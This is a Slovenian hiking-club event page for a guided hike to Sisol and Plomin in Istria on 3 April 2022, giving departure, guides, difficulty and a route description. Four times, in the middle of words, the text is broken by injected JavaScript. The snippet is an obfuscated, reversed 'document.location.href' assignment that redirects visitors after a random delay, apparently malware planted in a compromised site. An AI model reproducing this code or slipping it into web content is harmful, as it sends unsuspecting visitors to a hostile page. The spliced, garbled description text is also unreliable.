POHOD NA HRVAŠKEM: SISOL (835 M), PLOMINSKA GORA

Loading dogodki

« Vsi dogodki

  • Ta dogodek je minil.

POHOD NA HRVAŠKEM: SISOL (835 M), PLOMINSKA GORA

3. aprila, 2022 @ 5:00 - 22:00

Datum odhoda: 3.  4. 2022 ob 5.00, Avtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobustna postaja Šoštanj

Vodniki: Vlado Stropnik, Andreja Konovšek Jalen

Zahtevnost poti: zahtevna pot

Čas hoje:  4 ure

Oprema: pohodniške  palice, dobri čevlji

Cena: po dogovoru

Prijave: Cvetličarna Nahtigal do četrtka, 31.03.2022 do 12. ure.

Opis poti: Sisol je gora v Istri. Kljub svoji skromni nadmorski višini (835 m) daje vtis mogočne gore. S svojimi prostranimi pobočji in dolgim vršnim grebenom tvori del goske pregrade, ki ločuje vzhodno istrsko obalo od notranjosti istrskega polotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toka. Planinci uvrščamo Sisol kar v območje grebena Učke. Omenjeno območje, ki meri približno 160 kvadratnih kilometrov, je bilo leta 1999 proglašeno za naravni park. Hrvatje ga imenujejo Park prirode Učka. Našo ciljno goro bomo osvojili iz slikovitega priobalnega kraja Brseč. Po približno treh urah zmerne hoje bomo dosegli vršni greben Sisola, ki nam bo v primeru lepega vremena postregel z lepimi razgledi na Kvarner in njegove otobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toke na vzhodu in na notranjost Istre s Čepičkim poljem na zahodu. O zanimivi zgodovini slednjega bomo na vrhu rekli nekaj besed. Nadaljevali bomo proti jugu in po treh urah sestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topili v Plomin oziroma na obalo Plominskega zaliva. Če želite spoznati nove lepote Istre, se nam pridružite.

Podrobnosti

Datum:
3. aprila, 2022
Ura:
5:00 - 22:00
Kategorija Dogodek:

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki